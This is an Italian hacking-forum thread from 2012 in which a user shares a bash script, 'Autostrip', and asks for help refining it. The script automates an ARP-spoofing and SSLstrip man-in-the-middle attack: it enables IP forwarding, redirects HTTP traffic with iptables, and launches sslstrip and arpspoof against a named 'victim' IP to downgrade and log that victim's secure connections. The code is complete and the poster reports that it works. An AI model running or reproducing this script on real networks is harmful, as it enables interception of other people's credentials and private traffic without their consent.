arpspoof-sslstrip

Started by weVeg, January 23, 2012, 09:16:24 PM

Previous topic - Next topic

weVeg

a) Non so se sia la sezione giusta, ma sembrava quella più adatta, nel caso spostate
b) Mi vergogno non poco per quello che sto per proporvi, ma 2 bicchieri di vino mi hanno reso immune all'ansia da prestazione
c) Abbiate pazienza, non sono un programmatore ma l'unica cosa per colmare le lacune è chiedere a voi di correggermi e suggerirmi....

dunque, partendo dal post del buon http://www.clshack.com/sslstrip-ettercap-attack-ssl-and-sniff-secure-connetions.html
ho deciso di fare uno script per gestire le operazioni in automatico, e questo è il risultato:

#!/bin/bash
#Autostrip
#Automazione SslStrip+arpspoof
#


DPORT="80" ; #Porta che voglio reindirizzare verso la TPORT
TPORT="1000" ; #Porta usata da SSLStrip, cambiala se vuoi o se occupata da altro!
IPF=/proc/sys/net/ipv4/ip_forward ;

# FUNZIONE DI AIUTO
fun_help () {
echo
echo
echo  "[-]Autostrip automatizza le operazioni comuni per lo sniffing"
echo  "[-]Reindirizza la porta 80 sulla porta 1000 di SSLStrip"
echo  "[-]Puoi modificare la \"to-port\" 1000, cambiando il valore di \"\$TPORT\""
echo  "[-]Devi avere installato sslstrip e arpspoof,"
echo  "[-]Esegui\"apt-get install sslstrip arpspoof\" in caso contrario"
echo  "[-]Utilizzo: ./autostrip.sh ip_gateway ip_vittima interfaccia"
echo  "[-]Inserisci i parametri nell'ordine esatto indicato."
echo  "[*]Esempio: ./autostrip.sh 192.168.0.1 192.168.0.100 wlan0"
echo  "[***]Usa la testa e Good Hack!"

exit
}
# FINE HELP

# CONTROLLO: UID, PARAMETRI, PROG. NECESSARI, IP_FORWARD
if [ $UID != "0" ]
then
echo "Non hai i permessi necessari per eseguire lo script! need to be root!" && fun_help
fi

which sslstrip || echo "sslstrip non è presente" exit ;
which arpspoof || echo "arpspoof non è presente" exit ;      


if [ `cat $IPF` = "0" ]
then
echo "attivo ip_forward che non lo era" && echo 1 > $IPF ;
else
echo "ip_forward già attivo"
fi


if [ $# != "3" ] #non controllo che gli indirizzi siano giusti, che si fotta!
then
echo "hai inserito $# parametri, devi inserirne 3" && fun_help
else
echo "Tutti i controlli superati con successo!!"
fi
# FINE DEI CONTROLLI

echo

# PREPARO IPTABLES
iptables -t nat -A PREROUTING -p tcp --destination-port $DPORT -j REDIRECT --to-port $TPORT
if [ $? != 0 ]
then
echo "impossibile scrivere le iptables" && fun_help
else
echo "iptables scritte con successo!"
fi
# FINE IPTABLES

echo

# RIEPILOGO
echo "[*]IP Gateway:$1"
echo "[*]IP Vittima:$2"
echo "[*]Interfaccia:$3"

echo -n "Premi si per continuare, n per abortire:[si] "
read TASTO
case $TASTO in
n)echo "esco!" && exit ;;
s)echo  ;;
*)echo  ;;
esac

echo "bella pe tte!"
# FINE RIEPILOGO

echo

# AVVIO SSLStrip
( xfce4-terminal -e "sslstrip -l $TPORT -w log_ssl -p -a" ) &
if [ $? != 0 ]
then
echo "sslstrip ha fallito" && fun_help
else
echo "sslstrip avviato con successo!"
fi
##
echo

#AVVIO ARPSPOOF
( xfce4-terminal -e  "arpspoof -i $3 -t $2 $1" ) &
if [ $? != 0 ]
then
echo "arpspoof ha fallito" && fun_help
else
echo "arpspoof avviato con successo!"
fi
##

echo





Funziona? ni! Nel senso non ci sono più errori ma è evidente che vada migliorato e poi, la cosa che mi preme di più è avviare arpspoof e sslstrip con processi separati ma purtroppo non riesco a trovare più vecchie dispense che mi mostravano come fare (son sicuro di aver letto qualcosa a proposito), ho provato anche con xterm -e      ma non funfa.... tra l'altro in questo modo girano in bg, forse sarebbe meglio in fg??? se qualche anima pia ha voglia di darmi qualche dritta, io son qui!
Grazie e scusate il disturbo!!!

edit:script aggiornato e funzionante... ora arpspoof e sslstrip si aprono in terminali separati e indipendenti!
una voce libera è sempre liberatrice
under_r00t

devilnoe


weVeg

Quote from: devilnoe on January 24, 2012, 01:19:54 PM
please dude, english :hope:
this is just help request to improve my script... only this... nothing else!!
bye!
una voce libera è sempre liberatrice
under_r00t